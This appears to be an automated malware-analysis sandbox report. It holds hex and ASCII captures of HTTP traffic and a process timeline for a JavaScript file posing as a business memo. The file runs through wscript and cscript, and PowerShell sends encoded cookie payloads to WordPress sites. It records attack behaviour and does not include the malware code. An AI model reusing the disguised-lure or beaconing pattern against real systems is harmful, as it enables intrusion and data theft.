                                                    Data Ascii: f11e1e}.tie-slider-nav{width:100%;position:absolute;z-index:1;top:50%;margin-top:-23px}@media (min-width:992px){.tie-slider-nav{opacity:0}}@media (max-width:767px){.grid-slider-wrapper .tie-slider-nav{display:none}}.slider-arrow-nav{float:right;margin-lef
                                                    2024-12-18 10:23:33 UTC52INData Raw: 65 61 5f 32 20 2e 63 6f 6d 70 6f 6e 65 6e 74 73 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 73 2d 66 6c 0d 0a
                                                    Data Ascii: ea_2 .components{-webkit-flex-direction:row;-ms-fl
                                                    2024-12-18 10:23:33 UTC16384INData Raw: 38 30 30 30 0d 0a 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 23 6d 6f 62 69 6c 65 2d 73 65 61 72 63 68 20 2e 73 65 61 72 63 68 2d 66 6f 72 6d 3a 61 66 74 65 72 7b 6c 65 66 74 3a 31 30 70 78 3b 72 69 67 68 74 3a 61 75 74 6f 7d 23 6d 6f 62 69 6c 65 2d 73 65 61 72 63 68 20 2e 73 65 61 72 63 68 2d 66 69 65 6c 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 7d 23 6d 6f 62 69 6c 65 2d 73 65 61 72 63 68 20 2e 73 65 61 72 63 68 2d 73 75 62 6d 69 74 7b 72 69 67 68 74 3a 61 75 74 6f 3b 6c 65 66 74 3a 35 70 78 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 39 31 70 78 29 7b 2e 68 65 61 64 65 72 2d 6c 61 79 6f 75 74 2d 31 20
                                                    Data Ascii: 8000ex-direction:row;flex-direction:row}#mobile-search .search-form:after{left:10px;right:auto}#mobile-search .search-field{padding-left:45px;padding-right:20px}#mobile-search .search-submit{right:auto;left:5px}@media (max-width:991px){.header-layout-1
                                                    2024-12-18 10:23:33 UTC16384INData Raw: 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 65 37 65 37 65 37 7d 23 72 61 6e 6b 2d 6d 61 74 68 2d 72 69 63 68 2d 73 6e 69 70 70 65 74 2d 77 72 61 70 70 65 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 74 6f 74 61 6c 2d 77 72 61 70 70 65 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 72 65 76 69 65 77 2d 73 74 61 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 72 65 76 69 65 77 2d 72 65 73 75 6c 74 2d 77 72 61 70 70 65 72 20 2e 72 61 6e 6b 2d 6d 61 74 68 2d 72 65 76 69 65 77 2d 72 65 73 75 6c 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 63 6f 6c 6f 72 3a 23 66 66 62 65 30 31 7d 23 72 61 6e 6b 2d 6d 61
                                                    Data Ascii: ition:relative;color:#e7e7e7}#rank-math-rich-snippet-wrapper .rank-math-total-wrapper .rank-math-review-star .rank-math-review-result-wrapper .rank-math-review-result{position:absolute;top:0;left:0;overflow:hidden;white-space:nowrap;color:#ffbe01}#rank-ma
                                                    2024-12-18 10:23:33 UTC8INData Raw: 6e 74 2d 6d 65 6e 0d 0a
                                                    Data Ascii: nt-men
                                                    2024-12-18 10:23:33 UTC16384INData Raw: 38 30 30 30 0d 0a 75 2d 69 74 65 6d 20 63 75 72 72 65 6e 74 5f 70 61 67 65 5f 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 6f 6d 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 39 20 74 69 65 2d 63 75 72 72 65 6e 74 2d 6d 65 6e 75 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e d7 93 d7 a3 20 d7 94 d7 91 d7 99 d7 aa 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 69 64 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 35 30 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 30 22 3e 3c 61 20 68 72 65 66 3d 22 3f 70 61 67 65 5f 69 64 3d 34 37 22 3e d7 90
                                                    Data Ascii: 8000u-item current_page_item menu-item-home menu-item-9 tie-current-menu"><a href="/" aria-current="page"> </a></li> <li id="menu-item-50" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50"><a href="?page_id=47">
                                                    2024-12-18 10:23:33 UTC16384INData Raw: 73 73 6c 3d 31 22 20 64 61 74 61 2d 6c 61 7a 79 2d 73 72 63 3d 22 2f 2f 69 30 2e 77 70 2e 63 6f 6d 2f 70 65 6e 73 75 6e 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 31 2f 62 65 6e 2d 6f 2d 62 72 6f 2d 5a 62 57 53 74 5f 48 7a 30 2d 49 2d 75 6e 73 70 6c 61 73 68 2d 31 2e 6a 70 67 3f 72 65 73 69 7a 65 3d 33 39 30 25 32 43 32 32 30 26 61 6d 70 3b 73 73 6c 3d 31 22 2f 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 33 39 30 22 20 68 65 69 67 68 74 3d 22 32 32 30 22 20 73 72 63 3d 22 2f 2f 69 30 2e 77 70 2e 63 6f 6d 2f 70 65 6e 73 75 6e 69 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 31 2f 30 31 2f 62 65 6e 2d 6f 2d 62 72 6f 2d 5a 62 57 53 74 5f 48 7a 30 2d
                                                    Data Ascii: ssl=1" data-lazy-src="//i0.wp.com/pensuni.com/wp-content/uploads/2021/01/ben-o-bro-ZbWSt_Hz0-I-unsplash-1.jpg?resize=390%2C220&amp;ssl=1"/><noscript><img width="390" height="220" src="//i0.wp.com/pensuni.com/wp-content/uploads/2021/01/ben-o-bro-ZbWSt_Hz0-
                                                    2024-12-18 10:23:33 UTC8INData Raw: 25 32 30 78 6d 6c 0d 0a
                                                    Data Ascii: %20xml
                                                    2024-12-18 10:23:33 UTC16384INData Raw: 38 30 30 30 0d 0a 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 25 32 30 76 69 65 77 42 6f 78 3d 27 30 25 32 30 30 25 32 30 33 39 30 25 32 30 32 32 30 27 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 20 63 6c 61 73 73 3d 22 61 74 74 61 63 68 6d 65 6e 74 2d 6a 61 6e 6e 61 68 2d 69 6d 61 67 65 2d 6c 61 72 67 65 20 73 69 7a 65 2d 6a 61 6e 6e 61 68 2d 69 6d 61 67 65 2d 6c 61 72 67 65 20 77 70 2d 70 6f 73 74 2d 69 6d 61 67 65 22 20 61 6c 74 3d 22 d7 a6 d7 95 d7 9e d7 aa 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 64 61 74 61 2d 61 74 74 61 63 68 6d 65 6e 74 2d 69 64 3d 22 31 34 30 31 22 20 64 61 74 61 2d 70 65 72 6d 61 6c 69 6e 6b 3d 22 68 74 74 70 73 3a 2f 2f 70 65 6e 73 75 6e 69 2e 63 6f 6d 2f 3f 61 74
                                                    Data Ascii: 8000ns='http://www.w3.org/2000/svg'%20viewBox='0%200%20390%20220'%3E%3C/svg%3E" class="attachment-jannah-image-large size-jannah-image-large wp-post-image" alt="" decoding="async" data-attachment-id="1401" data-permalink="https://pensuni.com/?at


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.11.2049748104.21.10.2244431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:23:36 UTC2262OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVQy07DMBD8FfIDPSHuxQSaQ9WobqnUCwrOJlnil3adNJXy8Ti4lAPywbO7M571fFaqb8kNtj5U3G8chzlTznYJMDHHKzTG2TmrtU79+mLmDCavHQHNWeNsqGlMs6LWMGfYNpM4FhJoRHWr822c2gBa+M2LKOWo/mpQ+FN/dfjBvyLN1WK/BePo+iCc8QTMuKyya5pIERpVf3D7YelYWHu/Kt6EWJ3Q3p29uwB [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: alseraj.net
                                                    Connection: Close
                                                    2024-12-18 10:23:37 UTC838INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:23:36 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Last-Modified: Wed, 18 Dec 2024 09:38:26 GMT
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sGIfaWZlaOoydK33nHYsWHsio%2FO6Abv2ZO3wbm1UalR0gFXTD%2BF9m09CB7rAO%2Fthi7KttKw%2FNJQnVD3smfbEYm9QSSLrCxKezh5sHmZDvVa65yyOlrQYyQ2xzxzY4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8f3e703ccb3cbcc0-ATL
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=140866&min_rtt=140678&rtt_var=29977&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=2881&delivery_rate=27095&cwnd=251&unsent_bytes=0&cid=a4e23bd230a5f24f&ts=838&x=0"
                                                    2024-12-18 10:23:37 UTC531INData Raw: 37 64 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 72 74 6c 22 20 6c 61 6e 67 3d 22 61 72 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65
                                                    Data Ascii: 7d37<!DOCTYPE html><html dir="rtl" lang="ar" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"> <style>img:is([size
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d8 b4 d8 a8 d9 83 d8 a9 20 d8 a7 d9 84 d8 b3 d8 b1 d8 a7 d8 ac 20 d9 81 d9 8a 20 d8 a7 d9 84 d8 b7 d8 b1 d9 8a d9 82 20 d8 a7 d9 84 d9 89 20 d8 a7 d9 84 d9 84 d9 87 d8 9b 20 d9 85 d9 88 d9 82 d8 b9 20 d8 ab d9 82 d8 a7 d9 81 d9 8a d8 8c 20 d8 a5 d8 b9 d9 84 d8 a7 d9 85 d9 8a 20 d9 88 d8 aa d8 a8 d9 84 d9 8a d8 ba d9 8a d8 8c 20 d9 8a d9 87 d8 af d9 81 20 d9 84 d9 86 d8 b4 d8 b1 20 d9 85 d8 b9 d8 a7 d8 b1 d9 81 20 d8 a7 d9 84 d8 a5 d8 b3 d9 84 d8 a7 d9 85 20 d8 a7 d9 84 d9 85 d8 ad d9 85 d9 91 d8 af d9 8a 20 d9 88 d8 aa d8 b1 d9 88 d9 8a d8 ac 20 d8 a7 d9 84 d8 ab d9 91 d9 82 d8 a7 d9 81 d8 a9 20 d8 a7 d9 84 d8 af d9 91 d9 8a d9 86
                                                    Data Ascii: /title><meta name="description" content="
                                                    2024-12-18 10:23:37 UTC1369INData Raw: d9 84 d8 b3 d8 b1 d8 a7 d8 ac 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 32 30 32 34 2d 31 32 2d 31 38 54 31 30 3a 32 36 3a 32 37 2b 30 33 3a 30 30 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 3a 73 65 63 75 72 65 5f 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 77 70 2d 63
                                                    Data Ascii: " /><meta property="og:updated_time" content="2024-12-18T10:26:27+03:00" /><meta property="og:image" content="https://alseraj.net/wp-content/uploads/2023/01/alseraj.jpg" /><meta property="og:image:secure_url" content="https://alseraj.net/wp-c
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 65 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 61 6c 73 65 72 61 6a 2e 6a 70 67 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 31 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 83 d9 8f d8 aa d8 a8 20 d8 a8 d9 88 d8 a7 d8 b3 d8 b7 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 31 22 20 63 6f 6e 74 65 6e 74 3d 22 73 65 72 61 64 6f 74 74 69 6e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 6c 61 62 65 6c 32 22 20 63 6f 6e 74 65 6e 74 3d 22 d9 85 d8 af d8 a9 20 d8 a7 d9 84 d9 82 d8 b1 d8 a7 d8 a1 d8 a9 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 61 74 61 32 22 20 63 6f 6e 74 65
                                                    Data Ascii: et/wp-content/uploads/2023/01/alseraj.jpg" /><meta name="twitter:label1" content=" " /><meta name="twitter:data1" content="seradottin" /><meta name="twitter:label2" content=" " /><meta name="twitter:data2" conte
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 33 5c 75 30 36 33 31 5c 75 30 36 32 37 5c 75 30 36 32 63 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 23 70 65 72 73 6f 6e 22 7d 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f
                                                    Data Ascii: 0643\u0629 \u0627\u0644\u0633\u0631\u0627\u062c","publisher":{"@id":"https://alseraj.net/#person"},"inLanguage":"ar","potentialAction":{"@type":"SearchAction","target":"https://alseraj.net/?s={search_term_string}","query-input":"required name=search_term_
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 65 2e 67 72 61 76 61 74 61 72 2e 63 6f 6d 2f 61 76 61 74 61 72 2f 66 63 31 32 62 65 39 35 37 63 65 62 39 32 39 32 32 61 32 32 39 64 63 37 61 37 31 63 61 38 30 30 3f 73 3d 39 36 26 61 6d 70 3b 64 3d 62 6c 61 6e 6b 26 61 6d 70 3b 72 3d 67 22 2c 22 63 61 70 74 69 6f 6e 22 3a 22 73 65 72 61 64 6f 74 74 69 6e 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 61 72 22 7d 2c 22 73 61 6d 65 41 73 22 3a 5b 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 61 62 69 62 61 6c 6b 61 7a 65 6d 69 2e 63 6f 6d 22 5d 7d 2c 7b 22 68 65 61 64 6c 69 6e 65 22 3a 22 5c 75 30 36 33 34 5c 75 30 36 32 38 5c 75 30 36 34 33 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c
                                                    Data Ascii: d=blank&amp;r=g","url":"https://secure.gravatar.com/avatar/fc12be957ceb92922a229dc7a71ca800?s=96&amp;d=blank&amp;r=g","caption":"seradottin","inLanguage":"ar"},"sameAs":["https://www.habibalkazemi.com"]},{"headline":"\u0634\u0628\u0643\u0629 \u0627\u0644\
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 36 34 38 5c 75 30 36 34 35 5c 75 30 36 32 34 5c 75 30 36 34 34 5c 75 30 36 35 31 5c 75 30 36 34 31 5c 75 30 36 32 37 5c 75 30 36 32 61 20 5c 75 30 36 33 33 5c 75 30 36 34 35 5c 75 30 36 32 37 5c 75 30 36 32 64 5c 75 30 36 32 39 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 34 5c 75 30 36 35 31 5c 75 30 36 34 61 5c 75 30 36 32 65 20 5c 75 30 36 32 64 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 38 20 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 34 33 5c 75 30 36 32 37 5c 75 30 36 33 38 5c 75 30 36 34 35 5c 75 30 36 34 61 2e 22 2c 22 64 61 74 65 50 75 62 6c 69 73 68 65 64 22 3a 22 32 30 32 32 2d 30 32 2d 30 36 54 30 31 3a 34 30 3a 30 31 2b 30 33 3a 30 30 22 2c 22 64 61 74 65 4d 6f 64 69 66 69 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 31 38 54
                                                    Data Ascii: 648\u0645\u0624\u0644\u0651\u0641\u0627\u062a \u0633\u0645\u0627\u062d\u0629 \u0627\u0644\u0634\u0651\u064a\u062e \u062d\u0628\u064a\u0628 \u0627\u0644\u0643\u0627\u0638\u0645\u064a.","datePublished":"2022-02-06T01:40:01+03:00","dateModified":"2024-12-18T
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 6c 73 65 72 61 6a 2e 6e 65 74 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 37 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61
                                                    Data Ascii: /core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/alseraj.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timesta
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 61 64 46 72 65 71 75 65 6e 74 6c 79 3a 21 30 7d 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 28 61 2c 65 2c 6e 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f 3d 22 77 70 45 6d 6f 6a 69 53 65 74 74 69 6e 67 73 53 75 70
                                                    Data Ascii: adFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSup
                                                    2024-12-18 10:23:37 UTC1369INData Raw: 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 7c 7c 28 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 2c 28 65 3d 6e 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 3f 74 28 65 2e 63 6f 6e 63 61 74 65 6d 6f 6a 69 29 3a 65 2e 77 70 65 6d 6f 6a 69 26 26 65 2e 74
                                                    Data Ascii: pports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.t


                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:05:15:24
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Memo - Impairment Test 2023 MEX010B (5).js"
                                                    Imagebase:0x7ff6c60f0000
                                                    File size:170'496 bytes
                                                    MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:05:16:07
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wscript.EXE AUTOMO~1.JS
                                                    Imagebase:0x7ff6c60f0000
                                                    File size:170'496 bytes
                                                    MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:05:16:37
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\conhost.exe" cscript "AUTOMO~1.JS"
                                                    Imagebase:0x7ff6b8e40000
                                                    File size:875'008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:05:16:37
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\cscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cscript AUTOMO~1.JS
                                                    Imagebase:0x7ff6ad960000
                                                    File size:161'280 bytes
                                                    MD5 hash:B8454647EFC71192BF7B1572D18F7BD8
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:05:16:37
                                                    Start date:18/12/2024
                                                    Path:C:\Windows\System32\wscript.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wscript.EXE AUTOMO~1.JS
                                                    Imagebase:0x7ff6c60f0000
                                                    File size:170'496 bytes
                                                    MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
